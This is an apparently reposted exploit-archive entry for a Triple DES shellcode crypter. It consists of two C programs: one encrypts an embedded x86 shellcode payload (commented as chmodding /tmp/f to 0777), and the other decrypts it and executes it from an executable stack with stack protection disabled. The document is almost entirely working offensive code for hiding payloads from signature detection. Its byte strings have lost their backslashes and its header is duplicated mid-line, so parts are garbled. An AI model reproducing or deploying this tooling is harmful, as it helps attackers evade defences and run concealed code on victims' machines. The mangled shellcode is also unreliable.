Get Rid of Ads!

Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

# Exploit Title: 3DES Shellcode crypter
# Date: 08/07/2022
# Exploit Author: d7x
# Tested on: Ubuntu x86 / Ubuntu x86_64 / Debian 11 "bullseye"

cat > 3des_crypte # Exploit Title: 3DES Shellcode crypter
# Date: 08/07/2022
# Exploit Author: d7x
# Tested on: Ubuntu x86 / Ubuntu x86_64 / Debian 11 "bullseye"

cat > 3des_crypter.c << EOF
/* ***
*
* 3DES Shellcode crypter by d7x
*
* d7x.promiselabs.net
*
* Usage: gcc -fno-stack-protector -zexecstack -m32 -o 3des_crypter 3des_crypter.c -lssl -lcrypto
*
* ***/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/des.h>

/* Triple DES key for Encryption and Decryption */
DES_cblock Key1 = "3DES";
DES_cblock Key2 = "Crypter";
DES_cblock Key3 = "by d7x";
DES_key_schedule SchKey1,SchKey2,SchKey3;

/* Print Encrypted and Decrypted bytes */
void print_data(const char *tittle, const void* data, int len);

int main()
{

/* Apply 3DES keys */
DES_set_key((DES_cblock *)Key1, &SchKey1);
DES_set_key((DES_cblock *)Key2, &SchKey2);
DES_set_key((DES_cblock *)Key3, &SchKey3);

/* Place shellcode here */
unsigned char input_data[] = "xbbxccxfex70x5cxdbxd8xd9x74x24xf4x5dx29xc9xb1x08x83xc5x04x31x5dx11x03x5dx11xe2x39x67x1ax53x99xcax33x6cx19xebxc3x5cx6dx86xb3x8dxebx58x6fxbax0cx59x8fx3axabx97x0fx50x4ax70xddx25";
/* => chmods /tmp/f to 0777 */

/* Init vector */
DES_cblock iv = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };

// DES_cblock iv = { 0xe1, 0xe2, 0xe3, 0xd4, 0xd5, 0xc6, 0xc7, 0xa8 };
DES_set_odd_parity(&iv);

/* Check for Weak key generation: https://www.openssl.org/docs/manmaster/man3/DES_set_key_checked.html,
* If the key is a weak key, then -2 is returned */
if ( -2 == (DES_set_key_checked(&Key1, &SchKey1) || DES_set_key_checked(&Key2, &SchKey2) || DES_set_key_checked(&Key3, &SchKey3)))
{
printf(" Weak key .... ");
return 1;
}

/* Buffers for Encryption and Decryption */
unsigned char* cipher[sizeof(input_data)];
unsigned char* text[sizeof(input_data)];

/* Triple-DES CBC Encryption */
DES_ede3_cbc_encrypt( (unsigned char*)input_data, (unsigned char*)cipher, sizeof(input_data), &SchKey1, &SchKey2, &SchKey3,&iv, DES_ENCRYPT);

/* Triple-DES CBC Decryption */
memset(iv,0,sizeof(DES_cblock)); // You need to start with the same iv value
DES_set_odd_parity(&iv);
DES_ede3_cbc_encrypt( (unsigned char*)cipher, (unsigned char*)text, sizeof(input_data), &SchKey1, &SchKey2, &SchKey3,&iv,DES_DECRYPT);

/* Place the encrypted output here to verify the integrity */
unsigned char c[] =
"xd5x0cx1exeexfdx1fxb4x50xacxdex1ax59x4cx10xe9x7ax2cxb0x09x79x2cxe0x28x17xf4x60xc9x0ax33x27x48x03xc4x8dx4dx26x0bx7cxddxa9xcfx65x0fxacxd3xc2xa8x67xdexf6x83x02x8ax01xa8x1fx95x23x94x25xdfxcexa3x79x0cxdcx81xf7";
unsigned char decrypted[sizeof(c)];

// DES_set_odd_parity(&iv);
memset(iv,0,sizeof(DES_cblock)); // You need to start with the same iv value
DES_set_odd_parity(&iv);
DES_ede3_cbc_encrypt( (unsigned char*)c, (unsigned char*)decrypted, sizeof(c), &SchKey1, &SchKey2, &SchKey3,&iv,DES_DECRYPT);

/* Printing and Verifying */
print_data(" Original ",input_data,strlen(input_data));
print_data(" Encrypted",cipher,strlen(cipher));
print_data(" Decrypted",text,strlen(input_data));
print_data(" Decrypted (manual) ",decrypted,strlen(decrypted));

/* Run shellcode */
/* int (*ret)() = (int(*)())decrypted;
ret(); */

return 0;
}

void print_data(const char *tittle, const void* data, int len)
{
printf("%s : ",tittle);
const unsigned char * p = (const unsigned char*)data;
int i = 0;

/* len-1 to omit the x00 null terminator at the end */
for (; i<len;++i)
printf("\x%02x", *p++);
printf(" Size: %d", len);

printf(" ");
}
EOF

cat > 3des_decrypt.c << EOF
/* ***
*
* 3DES Shellcode crypter by d7x
*
* d7x.promiselabs.net
*
* Usage: gcc -fno-stack-protector -zexecstack -m32 -o 3des_decrypt 3des_decrypt.c -lssl -lcrypto
*
* ***/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/des.h>

/* Triple DES key for Encryption and Decryption */
DES_cblock Key1 = "3DES";
DES_cblock Key2 = "Crypter";
DES_cblock Key3 = "by d7x";
DES_key_schedule SchKey1,SchKey2,SchKey3;

/* Print Encrypted and Decrypted data packets */
void print_data(const char *tittle, const void* data, int len);

main()
{

/* Apply 3DES keys */

DES_set_key((DES_cblock *)Key1, &SchKey1);
DES_set_key((DES_cblock *)Key2, &SchKey2);
DES_set_key((DES_cblock *)Key3, &SchKey3);


/* Encrypted shellcode generated by 3des_crypter */
unsigned char shellcode_3des[] =
"xd5x0cx1exeexfdx1fxb4x50xacxdex1ax59x4cx10xe9x7ax2cxb0x09x79x2cxe0x28x17xf4x60xc9x0ax33x27x48x03xc4x8dx4dx26x0bx7cxddxa9xcfx65x0fxacxd3xc2xa8x67xdexf6x83x02x8ax01xa8x1fx95x23x94x25xdfxcexa3x79x44x5dx82xffx40x5dx82xffx06";


/* Init vector */

DES_cblock iv = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
DES_set_odd_parity(&iv);

/* buffer for the decrypted string */
unsigned char* decrypted[sizeof(shellcode_3des)];


/* Triple-DES CBC Decryption */

memset(iv,0,sizeof(DES_cblock)); // You need to start with the same iv value
DES_set_odd_parity(&iv);
DES_ede3_cbc_encrypt( (unsigned char*)shellcode_3des, (unsigned char*)decrypted, sizeof(shellcode_3des), &SchKey1, &SchKey2, &SchKey3,&iv,DES_DECRYPT);

print_data(" Encrypted",shellcode_3des,sizeof(shellcode_3des));
memcpy(shellcode_3des, decrypted, strlen(decrypted) );
// strcpy(shellcode_3des, decrypted);


/* Printing and executing */

print_data(" Decrypted",decrypted,strlen(decrypted));


/* Run shellcode */

int (*ret)() = (int(*)())shellcode_3des;
ret();

return 0;
}

void print_data(const char *tittle, const void* data, int len)
{
printf("%s : ",tittle);
const unsigned char * p = (const unsigned char*)data;
int i = 0;

/* len-1 to omit the x00 null terminator at the end */
for (; i<len;++i)
printf("\x%02x", *p++);
printf(" Size: %d", len);

printf(" ");
}
EOF